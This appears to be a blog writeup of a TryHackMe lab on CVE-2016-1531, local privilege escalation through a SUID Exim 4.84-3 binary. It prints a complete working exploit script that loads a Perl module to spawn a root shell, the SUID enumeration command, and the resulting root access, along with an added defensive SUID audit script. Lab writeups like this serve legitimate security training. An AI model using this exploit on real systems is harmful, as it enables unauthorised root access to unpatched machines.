[CVE-2016-1531] We tried to escalate privileges using the vulnerability in Exim 4.84.3. TryHackMe Linux PrivEsc Writeup Part 6

This time, we will try "CVE-2016-1531 Elevation of privileges using the vulnerability in Exim 4.84.3."
The target machine is the TryHackMe room below.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc"

This article is part 6.
If you would like to read the other writeups for TryHackMe's Linux PrivEsc room, please also see "Privilege Elevation Using Cron Jobs."

Please note that the explanation contains spoilers.


Preparation

First, start the target machine.
If you are using TryHackMe, select "Start Machine."

Once the IP address is displayed, the machine is up and running.

This time, the privilege escalation starts after you have connected to the target machine, so first confirm that you can connect via SSH.

    ┌──(hacklab㉿hacklab)-[~]
    └─$ ssh user@10.10.52.40
    user@10.10.52.40's password:
    Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Sun Apr 9 08:54:59 2023 from ip-10-18-110-90.eu-west-1.compute.internal
    user@debian:~$

Once you have access, the preparation is complete.

CVE-2016-1531 Privilege Elevation Using Vulnerability in Exim 4.84.3

Once you've come this far, try actually elevating your privileges.

What is SUID/SGID?

The CVE-2016-1531 exploit relies on the SUID/SGID mechanism.
First, let's briefly review SUID and SGID.

  • UID: In Linux, users are managed by an ID number called a UID.
  • SUID: When a file with the SUID bit set is executed by a user who has execute permission, it runs with the permissions of the file's owner.
  • SGID: When a file with the SGID bit set is executed by a user who has execute permission, it runs with the permissions of the file's group.

Find vulnerabilities

So let's start by looking for vulnerabilities.
We'll look for a SUID/SGID executable.

    user@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
    -rwxr-sr-x 1 root shadow 19528 Feb 15 2011 /usr/bin/expiry
    -rwxr-sr-x 1 root ssh 108600 Apr 2 2014 /usr/bin/ssh-agent
    -rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh
    -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudo
    -rwxr-sr-x 1 root tty 11000 Jun 17 2010 /usr/bin/bsd-write
    -rwxr-sr-x 1 root crontab 35040 Dec 18 2010 /usr/bin/crontab
    -rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp
    -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit
    -rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage
    -rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd
    -rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn
    -rwxr-sr-x 1 root tty 12000 Jan 25 2011 /usr/bin/wall
    -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
    -rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
    -rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
    -rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
    -rwsr-xr-x 1 root root 6776 Dec 19 2010 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 212128 Apr 2 2014 /usr/lib/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 10592 Feb 15 2016 /usr/lib/pt_chown
    -rwsr-xr-x 1 root root 36640 Oct 14 2010 /bin/ping6
    -rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping
    -rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount
    -rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su
    -rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount
    -rwxr-sr-x 1 root shadow 31864 Oct 17 2011 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 94992 Dec 13 2014 /sbin/mount.nfs

Note "/usr/sbin/exim-4.84-3" in the list of SUID/SGID executables.
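A defender's version of the same check, as an added example that is not part of the original writeup: it reads `ls -l` lines in the format of the listing above and reports every SUID/SGID file that is missing from a reviewed baseline. The baseline contents, the function name audit_suid and the /bin/ls sample line are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit SUID/SGID files against a reviewed baseline.
# Input: `ls -l` lines, e.g. from
#   find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
# Limitation: paths containing spaces are not handled (path is the last field).

# Assumed baseline: SUID/SGID paths an administrator has reviewed and accepts.
BASELINE="/usr/bin/passwd /usr/bin/sudo /bin/su /bin/ping /bin/mount"

# audit_suid: print "<bits> <owner>:<group> <path>" for each SUID/SGID file
# on stdin whose path is not listed in $BASELINE.
audit_suid() {
    awk -v baseline="$BASELINE" '
        BEGIN {
            n = split(baseline, b, " ")
            for (i = 1; i <= n; i++) ok[b[i]] = 1
        }
        {
            mode = $1; path = $NF; bits = ""
            # 4th mode character: owner execute slot, s/S means set-uid.
            if (substr(mode, 4, 1) ~ /[sS]/) bits = "SUID"
            # 7th mode character: group execute slot, s/S means set-gid.
            if (substr(mode, 7, 1) ~ /[sS]/)
                bits = (bits == "" ? "SGID" : bits "+SGID")
            if (bits != "" && !(path in ok))
                print bits, $3 ":" $4, path
        }'
}

# Sample input: three lines copied from the listing above plus one
# constructed non-SUID line (/bin/ls) to show that it is ignored.
SAMPLE='-rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd
-rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3
-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
-rwxr-xr-x 1 root root 34248 Oct 14 2010 /bin/ls'

printf '%s\n' "$SAMPLE" | audit_suid
```

Anything this prints is a SUID/SGID file nobody has signed off on; a root-owned SUID mail binary such as the Exim one here should be either patched or have its SUID bit reviewed.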

Next, look up "exim-4.84-3" vulnerabilities in Exploit-DB.

Searching Exploit-DB turns up "cve-2016-1531" as a hit.
Once you've come this far, all you have to do is run the shell script listed in Exploit-DB.

CVE-2016-1531 Elevation of privilege using Exim 4.84.3

Now let's create the shell script listed in Exploit-DB on the target machine.
On the TryHackMe machine, it has already been created at the path below.

    user@debian:~$ cat /home/user/tools/suid/exim/cve-2016-1531.sh
    #!/bin/sh
    # CVE-2016-1531 exim <= 4.84-3 local root exploit
    # ====
    # you can write files as root or force a perl module to
    # load by manipulating the perl environment and running
    # exim with the "perl_startup" arguement -ps.
    #
    # eg
    # [fantastic@localhost tmp]$ ./cve-2016-1531.sh
    # [ CVE-2016-1531 local root exploit
    # sh-4.3# id
    # uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
    #
    # -- Hacker Fantastic
    echo [ CVE-2016-1531 local root exploit
    cat > /tmp/root.pm << EOF
    package root;
    use strict;
    use warnings;
    system("/bin/sh");
    EOF
    PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

Finally, just run the shell script you created.

    user@debian:~$ /home/user/tools/suid/exim/cve-2016-1531.sh
    [ CVE-2016-1531 local root exploit
    sh-4.1# whoami
    root

I was able to successfully obtain root privileges.

Summary

This time, we tried "CVE-2016-1531 Elevation of privileges using the vulnerability in Exim 4.84.3."
Once you've done the reconnaissance, you just have to execute what is listed in Exploit-DB, so it was easy.

That said, you'll notice when you're actually scouting... I felt that there was still more to learn.
